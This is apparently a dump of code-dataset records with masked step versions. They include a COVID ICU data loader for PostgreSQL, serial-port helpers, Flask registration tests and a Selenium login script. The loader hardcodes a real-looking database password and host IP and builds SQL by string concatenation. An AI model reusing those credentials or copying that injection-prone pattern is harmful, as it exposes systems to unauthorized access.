np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"ICU_perc\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"ICU_perc\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"ICU_perc\"]),\n})\ndf_perc.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_perc.pkl\")\n\ndf_FZICU = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"FZICU\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"FZICU\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"FZICU\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"FZICU\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"FZICU\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"FZICU\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"FZICU\"]),\n \"Tirol\": np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"FZICU\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"FZICU\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"FZICU\"]),\n})\ndf_FZICU.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl\")\n\ndf_ICU_cap = pd.DataFrame({\n \"MeldeDatum\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"MeldeDatum\"]),\n \"Alle\": np.asarray(df.loc[df['Bundesland'] == \"Alle\"][\"ICU_capacity\"]),\n \"Burgenland\": np.asarray(df.loc[df[\"Bundesland\"] == \"Burgenland\"][\"ICU_capacity\"]),\n \"Kärnten\": np.asarray(df.loc[df['Bundesland'] == \"Kärnten\"][\"ICU_capacity\"]),\n \"Niederösterreich\": np.asarray(df.loc[df[\"Bundesland\"] == \"Niederösterreich\"][\"ICU_capacity\"]),\n \"Oberösterreich\": np.asarray(df.loc[df['Bundesland'] == \"Oberösterreich\"][\"ICU_capacity\"]),\n \"Salzburg\": np.asarray(df.loc[df[\"Bundesland\"] == \"Salzburg\"][\"ICU_capacity\"]),\n \"Steiermark\": np.asarray(df.loc[df['Bundesland'] == \"Steiermark\"][\"ICU_capacity\"]),\n \"Tirol\": np.asarray(df.loc[df[\"Bundesland\"] == \"Tirol\"][\"ICU_capacity\"]),\n \"Vorarlberg\": np.asarray(df.loc[df['Bundesland'] == \"Vorarlberg\"][\"ICU_capacity\"]),\n \"Wien\": np.asarray(df.loc[df[\"Bundesland\"] == \"Wien\"][\"ICU_capacity\"]),\n})\ndf_ICU_cap.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl\")\n\n# Writing to logfile\nfile_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')\nnow = datetime.now() # current date and time\ndate_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\nfile_object.write('Success: '+date_time+\"\\n\")\nfile_object.close()\n\n\n\n\"\"\"\n\nDB CONNECTOR\n\n\"\"\"\n\n# DB create string from csv for COVID data\nimport csv\nwith open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:\n instr = \"\"\n reader = csv.reader(f,delimiter=\";\")\n #print(reader)\n next(reader) # Skip the header row.\n for row in reader:\n instr=instr+(\"INSERT INTO icu_data VALUES ('\"+str(row[0])+\"','\"+str(row[1])+\"','\"+str(row[2])+\"','\"+str(row[3])+\"','\"+str(row[4])+\"','\"+str(row[5])+\"','\"+str(row[6])+\"','\"+str(row[7])+\"','\"+str(row[8])+\"');\" ) \n\n# DB create string from csv for MAP data\nimport csv\nimport sys\ncsv.field_size_limit(sys.maxsize)\nwith open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:\n instr_map = \"\"\n reader = csv.reader(f,delimiter=\",\")\n #print(reader)\n next(reader) # Skip the header row.\n for row in reader:\n instr_map=instr_map+(\"INSERT 
INTO icu_map VALUES ('\"+str(row[0])+\"','\"+str(row[1])+\"','\"+str(row[2])+\"','\"+str(row[3])+\"','\"+str(row[4])+\"','\"+str(row[5])+\"','\"+str(row[6])+\"','\"+str(row[7])+\"','\"+str(row[8])+\"','\"+str(row[9])+\"','\"+str(row[10])+\"');\" )\n\n\"\"\" connecting to DB, parsing SQL statements \"\"\"\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user=\"icu_bot\",\n password=\"5B2xwP8h4Ln4Y8Xs\",\n host=\"85.214.150.208\",\n port=\"5432\",\n database=\"ICU\")\n cursor = connection.cursor()\n sql_Query = statement\n #print(sql_Query)\n cursor.execute(sql_Query)\n connection.commit()\n #print(\"Selecting rows from mobile table using cursor.fetchall\")\n #mobile_records = cursor.fetchall() \n \n #print(\"Print each row and it's columns values\")\n #for row in mobile_records:\n # return_ls.append(list(row))\n \n except (Exception, psycopg2.Error) as error :\n print (\"Error while fetching data from PostgreSQL: \", error)\n \n finally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n #print(\"PostgreSQL connection is closed\")\n \n return return_ls\n\n\n# update database in postgis\ncsv_parser(\"DELETE FROM icu_data\")\ncsv_parser(instr)\n\n# Update map data in server\ncsv_parser(\"DELETE FROM icu_map\")\ncsv_parser(instr_map)\n\n\n\n\"\"\"\nGeoServer Connector\n\"\"\"\ntry:\n\tdf_geojson = pd.read_json(\"https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson\")\n\tdf_geojson.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl\")\nexcept:\n\tprint(\"an exception occured connecting to the geoserver\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import serial
import time
from Files_management import get_mov_parameters,change_mov_parameters
#-------------------------------------------------------------------------------
def create_port():
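    """Open the serial port named in the movement-parameters file at 9600 baud;
    on failure, mark the port as disabled in the parameters file and return False."""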
port = get_mov_parameters()[1]
try:
ser = serial.Serial(port=port,baudrate=9600,timeout=1)
return ser
except:
        print('Open port failed')
change_mov_parameters('0',port,'0','0')
return False
#-------------------------------------------------------------------------------
def port_status(ser):
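    """Check whether the serial link can be used: the port is open and the parameters
    file marks it as enabled, or it can be reopened; returns False (and clears the
    enabled flag in the file) when reopening fails."""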
if(ser.isOpen()):
if(get_mov_parameters()[0] == "1" or get_mov_parameters()[0] == "True"):
return True
else:
try:
create_port()
return True
except:
print("error opening")
change_mov_parameters('0',get_mov_parameters()[1],'0','0')
return False
#-------------------------------------------------------------------------------
def close_port(ser):
ser.close()
#-------------------------------------------------------------------------------
def send_value(value):
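    """Send `value` terminated by a space and newline over the serial port when the
    parameters file marks the link as enabled; prints 'True' on send, 'False' otherwise."""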
port = create_port()
status = get_mov_parameters()[0]
if(port_status(port)):
if(status == '1' or status == 'True'):
string = "".join([str(value),' \n'])
port.write(string.encode())
print('True')
else :
print('False')
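#-------------------------------------------------------------------------------
# Minimal usage sketch (assumes the parameters file names a valid port and the
# enabled flag is '1'); the value 90 is just an illustrative payload:
# send_value(90)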
|
normal
|
{
"blob_id": "72cda573bf9c744213a2957d51171f437f211353",
"index": 3467,
"step-1": "<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-2": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\n<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-3": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-4": "import serial\nimport time\nfrom Files_management import get_mov_parameters, change_mov_parameters\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-5": "import serial\nimport time\nfrom Files_management import get_mov_parameters,change_mov_parameters\n\n#-------------------------------------------------------------------------------\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port,baudrate=9600,timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0',port,'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef port_status(ser):\n if(ser.isOpen()):\n if(get_mov_parameters()[0] == \"1\" or get_mov_parameters()[0] == \"True\"):\n return True\n else: \n try:\n create_port()\n return True\n except:\n print(\"error opening\")\n change_mov_parameters('0',get_mov_parameters()[1],'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef close_port(ser):\n ser.close()\n\n#-------------------------------------------------------------------------------\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if(port_status(port)):\n if(status == '1' or status == 'True'):\n string = \"\".join([str(value),' \\n'])\n port.write(string.encode())\n print('True')\n else :\n print('False')\n \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import json
from test.test_basic import BaseCase
class TestUserRegister(BaseCase):
"""
TestClass to test the register function.
"""
def test_successful_register(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "User created successfully."}, response.json)
self.assertEqual(201, response.status_code)
def test_signup_with_non_existing_field(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r",
"email": "foo@bar.de"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "User created successfully."}, response.json)
self.assertEqual(201, response.status_code)
def test_signup_without_username(self):
# Given
payload = json.dumps({
"password": "1q2w3e4r"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"username": "This field cannot be blank!"}, response.json['message'])
self.assertEqual(400, response.status_code)
def test_signup_without_password(self):
# Given
payload = json.dumps({
"username": "userjw"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"password": "This field cannot be blank!"}, response.json['message'])
self.assertEqual(400, response.status_code)
def test_creating_already_existing_user(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r",
})
# Preconditions
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "A user '{}' already exists!".format(json.loads(payload)['username'])}, response.json)
self.assertEqual(400, response.status_code)
|
normal
|
{
"blob_id": "486362463dc07bdafea85de39a4a6d58cb8c8f26",
"index": 9643,
"step-1": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n <mask token>\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n <mask token>\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n <mask token>\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-3": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n payload = json.dumps({'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'username': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-4": "import json\nfrom test.test_basic import BaseCase\n\n\nclass TestUserRegister(BaseCase):\n \"\"\"\n TestClass to test the register function.\n \"\"\"\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n payload = json.dumps({'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'username': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-5": "import json\n\nfrom test.test_basic import BaseCase\n\n\nclass TestUserRegister(BaseCase):\n \"\"\"\n TestClass to test the register function.\n \"\"\"\n def test_successful_register(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"User created successfully.\"}, response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\",\n \"email\": \"foo@bar.de\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"User created successfully.\"}, response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n # Given\n payload = json.dumps({\n \"password\": \"1q2w3e4r\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"username\": \"This field cannot be blank!\"}, response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"password\": \"This field cannot be blank!\"}, response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\",\n })\n # Preconditions\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"A user '{}' already exists!\".format(json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestSTCHANGE():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_sTCHANGE(self):
# Test name: ST CHANGE
# Step # | name | target | value
# 1 | open | /main/desktop-login.html |
self.driver.get("http://10.51.30.52:8090/main/desktop-login.html")
# 2 | setWindowSize | 976x696 |
self.driver.set_window_size(976, 696)
# 3 | click | id=idInputUsername |
self.driver.find_element(By.ID, "idInputUsername").click()
# 4 | type | id=idInputUsername | SUPERVISOR
self.driver.find_element(By.ID, "idInputUsername").send_keys("SUPERVISOR")
# 5 | click | id=login-panel |
self.driver.find_element(By.ID, "login-panel").click()
# 6 | click | id=idInputPassword |
self.driver.find_element(By.ID, "idInputPassword").click()
# 7 | type | id=idInputPassword | **
self.driver.find_element(By.ID, "idInputPassword").send_keys("**")
# 8 | click | id=submit.button |
self.driver.find_element(By.ID, "submit.button").click()
# 9 | click | id=BVMAPS |
self.driver.find_element(By.ID, "BVMAPS").click()
# 10 | click | css=#UI_BADGES_GRID\.gridView\.row\#22_Tcell\#0 > div > div |
self.driver.find_element(By.CSS_SELECTOR, "#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div").click()
# 11 | click | id=badge.html.ribbon.properties |
self.driver.find_element(By.ID, "badge.html.ribbon.properties").click()
# 12 | click | id=__selection_4 |
self.driver.find_element(By.ID, "__selection_4").click()
# 13 | mouseDown | css=#\__pan_4 > .listItemNormal:nth-child(2) |
element = self.driver.find_element(By.CSS_SELECTOR, "#\\__pan_4 > .listItemNormal:nth-child(2)")
actions = ActionChains(self.driver)
actions.move_to_element(element).click_and_hold().perform()
# 14 | mouseUp | id=__selection_5 |
element = self.driver.find_element(By.ID, "__selection_5")
actions = ActionChains(self.driver)
actions.move_to_element(element).release().perform()
# 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |
self.driver.find_element(By.CSS_SELECTOR, "#PROPERTIES_CONTROLS td:nth-child(2) .middlePart").click()
# 16 | click | id=badge.html.ribbon.properties.apply |
self.driver.find_element(By.ID, "badge.html.ribbon.properties.apply").click()
# 17 | click | css=body > img |
self.driver.find_element(By.CSS_SELECTOR, "body > img").click()
# 18 | click | css=a > img |
self.driver.find_element(By.CSS_SELECTOR, "a > img").click()
# 19 | click | id=main.html.btn_logout |
self.driver.find_element(By.ID, "main.html.btn_logout").click()
|
normal
|
{
"blob_id": "87f8cc65cf7d0ea932de79a6daf5b29ad387ec6f",
"index": 7103,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestSTCHANGE:\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestSTCHANGE:\n\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n self.driver.get('http://10.51.30.52:8090/main/desktop-login.html')\n self.driver.set_window_size(976, 696)\n self.driver.find_element(By.ID, 'idInputUsername').click()\n self.driver.find_element(By.ID, 'idInputUsername').send_keys(\n 'SUPERVISOR')\n self.driver.find_element(By.ID, 'login-panel').click()\n self.driver.find_element(By.ID, 'idInputPassword').click()\n self.driver.find_element(By.ID, 'idInputPassword').send_keys('**')\n self.driver.find_element(By.ID, 'submit.button').click()\n self.driver.find_element(By.ID, 'BVMAPS').click()\n self.driver.find_element(By.CSS_SELECTOR,\n '#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div'\n ).click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties').click()\n self.driver.find_element(By.ID, '__selection_4').click()\n element = self.driver.find_element(By.CSS_SELECTOR,\n '#\\\\__pan_4 > .listItemNormal:nth-child(2)')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n element = self.driver.find_element(By.ID, '__selection_5')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n self.driver.find_element(By.CSS_SELECTOR,\n '#PROPERTIES_CONTROLS td:nth-child(2) .middlePart').click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties.apply'\n ).click()\n self.driver.find_element(By.CSS_SELECTOR, 'body > img').click()\n self.driver.find_element(By.CSS_SELECTOR, 'a > img').click()\n self.driver.find_element(By.ID, 'main.html.btn_logout').click()\n",
"step-4": "import pytest\nimport time\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n\nclass TestSTCHANGE:\n\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n self.driver.get('http://10.51.30.52:8090/main/desktop-login.html')\n self.driver.set_window_size(976, 696)\n self.driver.find_element(By.ID, 'idInputUsername').click()\n self.driver.find_element(By.ID, 'idInputUsername').send_keys(\n 'SUPERVISOR')\n self.driver.find_element(By.ID, 'login-panel').click()\n self.driver.find_element(By.ID, 'idInputPassword').click()\n self.driver.find_element(By.ID, 'idInputPassword').send_keys('**')\n self.driver.find_element(By.ID, 'submit.button').click()\n self.driver.find_element(By.ID, 'BVMAPS').click()\n self.driver.find_element(By.CSS_SELECTOR,\n '#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div'\n ).click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties').click()\n self.driver.find_element(By.ID, '__selection_4').click()\n element = self.driver.find_element(By.CSS_SELECTOR,\n '#\\\\__pan_4 > .listItemNormal:nth-child(2)')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n element = self.driver.find_element(By.ID, '__selection_5')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n self.driver.find_element(By.CSS_SELECTOR,\n '#PROPERTIES_CONTROLS td:nth-child(2) .middlePart').click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties.apply'\n ).click()\n self.driver.find_element(By.CSS_SELECTOR, 'body > img').click()\n self.driver.find_element(By.CSS_SELECTOR, 'a > img').click()\n self.driver.find_element(By.ID, 'main.html.btn_logout').click()\n",
"step-5": "# Generated by Selenium IDE\nimport pytest\nimport time\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n\nclass TestSTCHANGE():\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n # Test name: ST CHANGE\n # Step # | name | target | value\n # 1 | open | /main/desktop-login.html |\n self.driver.get(\"http://10.51.30.52:8090/main/desktop-login.html\")\n # 2 | setWindowSize | 976x696 |\n self.driver.set_window_size(976, 696)\n # 3 | click | id=idInputUsername |\n self.driver.find_element(By.ID, \"idInputUsername\").click()\n # 4 | type | id=idInputUsername | SUPERVISOR\n self.driver.find_element(By.ID, \"idInputUsername\").send_keys(\"SUPERVISOR\")\n # 5 | click | id=login-panel |\n self.driver.find_element(By.ID, \"login-panel\").click()\n # 6 | click | id=idInputPassword |\n self.driver.find_element(By.ID, \"idInputPassword\").click()\n # 7 | type | id=idInputPassword | **\n self.driver.find_element(By.ID, \"idInputPassword\").send_keys(\"**\")\n # 8 | click | id=submit.button |\n self.driver.find_element(By.ID, \"submit.button\").click()\n # 9 | click | id=BVMAPS |\n self.driver.find_element(By.ID, \"BVMAPS\").click()\n # 10 | click | css=#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div |\n self.driver.find_element(By.CSS_SELECTOR, \"#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div\").click()\n # 11 | click | id=badge.html.ribbon.properties |\n self.driver.find_element(By.ID, \"badge.html.ribbon.properties\").click()\n # 12 | click | id=__selection_4 |\n self.driver.find_element(By.ID, \"__selection_4\").click()\n # 13 | mouseDown | css=#\\__pan_4 > .listItemNormal:nth-child(2) |\n element = self.driver.find_element(By.CSS_SELECTOR, \"#\\\\__pan_4 > .listItemNormal:nth-child(2)\")\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n # 14 | mouseUp | id=__selection_5 |\n element = self.driver.find_element(By.ID, \"__selection_5\")\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n # 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |\n self.driver.find_element(By.CSS_SELECTOR, \"#PROPERTIES_CONTROLS td:nth-child(2) .middlePart\").click()\n # 16 | click | id=badge.html.ribbon.properties.apply |\n self.driver.find_element(By.ID, \"badge.html.ribbon.properties.apply\").click()\n # 